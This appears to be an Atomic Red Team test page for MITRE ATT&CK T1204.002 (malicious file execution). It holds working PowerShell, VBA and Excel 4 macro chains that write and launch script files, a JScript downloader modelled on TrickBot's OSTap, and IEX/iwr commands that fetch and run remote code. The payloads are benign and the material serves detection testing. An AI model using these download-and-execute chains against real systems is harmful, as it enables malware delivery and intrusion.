An adversary may rely upon a user opening a malicious file in order to gain execution. Users may be subjected to social engineering to get them to open a file that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001). Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl.Adversaries may employ various forms of Masquerading on the file to increase the likelihood that a user will open it.
While Malicious File frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after Internal Spearphishing.
This Test uses a VBA macro to create and execute #{jse_path} with cscript.exe. Upon execution, the .jse file launches wscript.exe. Execution is handled by Invoke-MalDoc to load and execute VBA code into Excel or Word documents. This is a known execution chain observed by the OSTap downloader commonly used in TrickBot campaigns. References: https://www.computerweekly.com/news/252470091/TrickBot-Trojan-switches-to-stealthy-Ostap-downloader
Supported Platforms: Windows
| Name | Description | Type | Default Value |
|---|---|---|---|
| jse_path | Path for the macro to write out the "malicious" .jse file | String | C:\Users\Public\art.jse |
| ms_product | Maldoc application Word or Excel | String | Word |
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
$macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n Shell`$ `"cscript.exe #{jse_path}`"`n"
Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"Remove-Item #{jse_path} -ErrorAction Ignoretry {
New-Object -COMObject "#{ms_product}.Application" | Out-Null
$process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
Stop-Process -Name $process
exit 0
} catch { exit 1 } Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"Uses cscript //E:jscript to download a file
Supported Platforms: Windows
| Name | Description | Type | Default Value |
|---|---|---|---|
| script_file | File to execute jscript code from | Path | %TEMP%\OSTapGet.js |
| file_url | URL to retrieve file from | Url | https://128.30.52.100/TR/PNG/iso_8859-1.txt |
echo var url = "#{file_url}", fso = WScript.CreateObject('Scripting.FileSystemObject'), request, stream; request = WScript.CreateObject('MSXML2.ServerXMLHTTP'); request.open('GET', url, false); request.send(); if (request.status === 200) {stream = WScript.CreateObject('ADODB.Stream'); stream.Open(); stream.Type = 1; stream.Write(request.responseBody); stream.Position = 0; stream.SaveToFile(filename, 1); stream.Close();} else {WScript.Quit(1);}WScript.Quit(0); > #{script_file}
cscript //E:Jscript #{script_file}del #{script_file} /F /Q >nul 2>&1This Test uses a VBA macro to execute cmd with flags observed in recent maldoc and 2nd stage downloaders. Upon execution, CMD will be launched. Execution is handled by Invoke-MalDoc to load and execute VBA code into Excel or Word documents.
Supported Platforms: Windows
| Name | Description | Type | Default Value |
|---|---|---|---|
| ms_product | Maldoc application Word or Excel | String | Word |
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
$macrocode = " a = Shell(`"cmd.exe /c choice /C Y /N /D Y /T 3`", vbNormalFocus)"
Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"try {
New-Object -COMObject "#{ms_product}.Application" | Out-Null
$process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
Stop-Process -Name $process
exit 0
} catch { exit 1 } Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"Malicious JavaScript executing CMD which spawns wscript.exe //e:jscript Execution is handled by Invoke-MalDoc to load and execute VBA code into Excel or Word documents.
Supported Platforms: Windows
| Name | Description | Type | Default Value |
|---|---|---|---|
| jse_path | jse file to execute with wscript | Path | C:\Users\Public\art.jse |
| ms_product | Maldoc application Word or Excel | String | Word |
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
$macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n a = Shell(`"cmd.exe /c wscript.exe //E:jscript #{jse_path}`", vbNormalFocus)`n"
Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"try {
New-Object -COMObject "#{ms_product}.Application" | Out-Null
$process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
Stop-Process -Name $process
exit 0
} catch { exit 1 } Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"Microsoft Office creating then launching a .bat script from an AppData directory. The .bat file launches calc.exe when opened.
Supported Platforms: Windows
| Name | Description | Type | Default Value |
|---|---|---|---|
| bat_path | Path to malicious .bat file | String | $("$env:temp\art1204.bat") |
| ms_product | Maldoc application Word or Excel | String | Word |
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
$macrocode = " Open `"#{bat_path}`" For Output As #1`n Write #1, `"calc.exe`"`n Close #1`n a = Shell(`"cmd.exe /c $bat_path `", vbNormalFocus)`n"
Invoke-MalDoc -macroCode $macrocode -officeProduct #{ms_product}try {
New-Object -COMObject "#{ms_product}.Application" | Out-Null
$process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
Stop-Process -Name $process
exit 0
} catch { exit 1 } Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"This module creates an Excel 4 Macro (XLM) enabled spreadsheet and executes it. The XLM will first write a "malicious" VBS file to %TEMP%, then execute this file. The VBS will download Process Explorer to the same directory (%TEMP%) and exec.
A note regarding this module. By default, this module will pull the current username from the system and places it into the macro. If you'd like to utilize the "=GET.WORKSPACE(26)" method, that many maldoc authors use, you will need to ensure that the User Name associated with Excel matches that of the local system. This username can be found under Files -> Options -> Username
Supported Platforms: Windows
| Name | Description | Type | Default Value |
|---|---|---|---|
| download_url | Download URL | String | https://live.sysinternals.com/procexp.exe |
| uname | Username for pathing | String | $env:Username |
$fname = "$env:TEMP\atomic_redteam_x4m_exec.vbs"
$fname1 = "$env:TEMP\procexp.exe"
if (Test-Path $fname) {
Remove-Item $fname
Remove-Item $fname1
}
$xlApp = New-Object -COMObject "Excel.Application"
$xlApp.Visible = $True
$xlApp.DisplayAlerts = $False
$xlBook = $xlApp.Workbooks.Add()
$sheet = $xlBook.Excel4MacroSheets.Add()
if ("#{uname}" -ne "") {
$sheet.Cells.Item(1,1) = "#{uname}"
} else {
$sheet.Cells.Item(1,1) = "=GET.WORKSPACE(26)"
}
$sheet.Cells.Item(2,1) = "procexp.exe"
$sheet.Cells.Item(3,1) = "atomic_redteam_x4m_exec.vbs"
$sheet.Cells.Item(4,1) = "=IF(ISNUMBER(SEARCH(`"64`",GET.WORKSPACE(1))), GOTO(A5),)"
$sheet.Cells.Item(5,1) = "=FOPEN(`"C:\Users\`"&A1&`"\AppData\Local\Temp\`"&A3&`"`", 3)"
$sheet.Cells.Item(6,1) = "=FWRITELN(A5, `"url = `"`"#{download_url}`"`"`")"
$sheet.Cells.Item(7,1) = "=FWRITELN(A5, `"`")"
$sheet.Cells.Item(8,1) = "=FWRITELN(A5, `"Set winHttp = CreateObject(`"`"WinHTTP.WinHTTPrequest.5.1`"`")`")"
$sheet.Cells.Item(9,1) = "=FWRITELN(A5, `"winHttp.Open `"`"GET`"`", url, False`")"
$sheet.Cells.Item(10,1) = "=FWRITELN(A5, `"winHttp.Send`")"
$sheet.Cells.Item(11,1) = "=FWRITELN(A5, `"If winHttp.Status = 200 Then`")"
$sheet.Cells.Item(12,1) = "=FWRITELN(A5, `"Set oStream = CreateObject(`"`"ADODB.Stream`"`")`")"
$sheet.Cells.Item(13,1) = "=FWRITELN(A5, `"oStream.Open`")"
$sheet.Cells.Item(14,1) = "=FWRITELN(A5, `"oStream.Type = 1`")"
$sheet.Cells.Item(15,1) = "=FWRITELN(A5, `"oStream.Write winHttp.responseBody`")"
$sheet.Cells.Item(16,1) = "=FWRITELN(A5, `"oStream.SaveToFile `"`"C:\Users\`"&A1&`"\AppData\Local\Temp\`"&A2&`"`"`", 2`")"
$sheet.Cells.Item(17,1) = "=FWRITELN(A5, `"oStream.Close`")"
$sheet.Cells.Item(18,1) = "=FWRITELN(A5, `"End If`")"
$sheet.Cells.Item(19,1) = "=FCLOSE(A5)"
$sheet.Cells.Item(20,1) = "=EXEC(`"explorer.exe C:\Users\`"&A1&`"\AppData\Local\Temp\`"&A3&`"`")"
$sheet.Cells.Item(21,1) = "=WAIT(NOW()+`"00:00:05`")"
$sheet.Cells.Item(22,1) = "=EXEC(`"explorer.exe C:\Users\`"&A1&`"\AppData\Local\Temp\`"&A2&`"`")"
$sheet.Cells.Item(23,1) = "=HALT()"
$sheet.Cells.Item(1,1).Name = "runme"
$xlApp.Run("runme")
$xlApp.Quit()
[System.Runtime.Interopservices.Marshal]::ReleaseComObject($xlBook) | Out-Null
[System.Runtime.Interopservices.Marshal]::ReleaseComObject($xlApp) | Out-Null
[System.GC]::Collect()
[System.GC]::WaitForPendingFinalizers()
Remove-Variable xlBook
Remove-Variable xlAppStop-Process -Name "procexp*" -ErrorAction Ignore
Remove-Item "$env:TEMP\atomic_redteam_x4m_exec.vbs" -ErrorAction Ignore
Remove-Item "$env:TEMP\procexp.exe" -ErrorAction Ignoretry {
New-Object -COMObject "Excel.Application" | Out-Null
Stop-Process -Name "Excel"
exit 0
} catch { exit 1 } Write-Host "You will need to install Microsoft Excel manually to meet this requirement"This module uses Google Chrome combined with ScriptControl to achieve code execution. It spawns a local webserver hosting our malicious payload. Headless Google Chrome will then reach out to this webserver and pull down the script and execute it. By default the payload will execute calc.exe on the system.
Supported Platforms: Windows
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1204.002\src\chromeexec-macrocode.txt" -officeProduct "Word" -sub "ExecChrome"try {
$wdApp = New-Object -COMObject "Word.Application"
Stop-Process -Name "winword"
exit 0 } catch { exit 1 } Write-Host "You will need to install Microsoft Word manually to meet this requirement"try {
$chromeInstalled = (Get-Item (Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe').'(Default)').VersionInfo.FileName
exit 0
} catch { exit 1 } Write-Host "You will need to install Google Chrome manually to meet this requirement"The Potentially Unwanted Applications (PUA) protection feature in antivirus software can identify and block PUAs from downloading and installing on endpoints in your network. These applications are not considered viruses, malware, or other types of threats, but might perform actions on endpoints that adversely affect their performance or use. This file is similar to EICAR test virus file, but is considered a Potentially Unwanted Application (PUA) instead of a VIRUS (i.e. not actually malicious, but is flagged as it to verify anti-pua protection).
Supported Platforms: Windows
| Name | Description | Type | Default Value |
|---|---|---|---|
| pua_url | url to PotentiallyUnwanted.exe | url | http://amtso.eicar.org/PotentiallyUnwanted.exe |
| pua_file | path to PotentiallyUnwanted.exe | Path | $env:TEMP/PotentiallyUnwanted.exe |
Invoke-WebRequest #{pua_url} -OutFile #{pua_file}
& "#{pua_file}"Remove-Item #{pua_file}